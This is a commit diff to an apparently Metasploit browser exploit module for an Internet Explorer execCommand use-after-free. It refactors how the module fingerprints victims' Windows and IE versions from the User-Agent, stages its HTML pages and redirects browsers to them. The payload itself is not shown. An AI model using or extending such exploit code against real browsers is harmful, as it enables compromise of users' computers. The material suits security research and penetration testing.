Additional changes

Updated get_target function, comment for original author, possible
bug in handling page redirection.

modules/exploits/windows/browser/ie_execcommand_uaf.rb

@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'unknown',     # Some secret ninja
+					'unknown',     # via ZDI
 					'eromang',     # First public discovery
 					'binjo',
 					'sinn3r',      # Metasploit
@@ -90,21 +90,28 @@ class Metasploit3 < Msf::Exploit::Remote
 		#If the user is already specified by the user, we'll just use that
 		return target if target.name != 'Automatic'
 
-		if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-			return targets[1]  #IE 7 on Windows XP SP3
+		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
-		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+
-			return targets[2]  #IE 8 on Windows XP SP3
+		ie_name = "IE #{ie}"
-		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
+
-			return targets[3]  #IE 7 on Windows Vista
+		case nt
-		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
+		when '5.1'
-			return targets[4]  #IE 8 on Windows Vista
+			os_name = 'Windows XP SP3'
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
+		when '6.0'
-			return targets[5]  #IE 8 on Windows 7
+			os_name = 'Windows Vista'
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
+		when '6.1'
-			return targets[6]  #IE 9 on Windows 7
+			os_name = 'Windows 7'
-		else
-			return nil
 		end
+
+		targets.each do |t|
+			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+				vprint_status("Target selected as: #{t.name}")
+				return t
+			end
+		end
+
+		return nil
 	end
 
 	def junk(n=4)
@@ -294,7 +301,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			js.obfuscate
 		end
 
-		html = <<-EOS
+		html = %Q|
 		<html>
 			<body>
 				<script>
@@ -309,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		        </script>
 			</body>
 		</html>
-		EOS
+		|
 
 		return html
 	end
@@ -345,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_request_uri(cli, request)
-		print_status request.headers['User-Agent']
+		uri       = request.uri
 		agent     = request.headers['User-Agent']
 		my_target = get_target(agent)
 
+		vprint_status("Requesting: #{uri}")
+		print_status(agent)
+
 		# Avoid the attack if the victim doesn't have the same setup we're targeting
 		if my_target.nil?
 			print_error("Browser not supported, sending a 404: #{agent.to_s}")
@@ -356,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		vprint_status("Requesting: #{request.uri}")
+		if uri =~ /#{@html2_name}/
-
-		if request.uri =~ /#{@html2_name}/
 			print_status("Loading #{@html2_name}")
 			html = load_html2
-		elsif request.uri =~ /#{@html1_name}/
+		elsif uri =~ /#{@html1_name}/
 			print_status("Loading #{@html1_name}")
 			html = load_html1(cli, my_target)
-		elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
+		elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
 			print_status("Redirecting to #{@html1_name}")
 			send_redirect(cli, "#{this_resource}/#{@html1_name}")
 			return